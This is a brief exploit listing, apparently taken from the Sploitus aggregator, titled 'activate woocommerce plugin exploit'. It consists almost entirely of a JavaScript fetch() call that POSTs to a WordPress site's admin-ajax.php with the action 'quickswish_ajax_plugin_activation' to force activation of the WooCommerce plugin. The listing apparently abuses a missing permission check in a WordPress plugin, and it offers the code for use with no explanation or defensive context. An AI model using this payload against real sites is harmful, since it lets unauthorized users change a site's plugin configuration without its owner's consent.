Share
## https://sploitus.com/exploit?id=WPEX-ID:9342470A-A0AD-4F0B-B95F-7DAA39A6362B
activate woocommerce plugin exploit:

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=quickswish_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));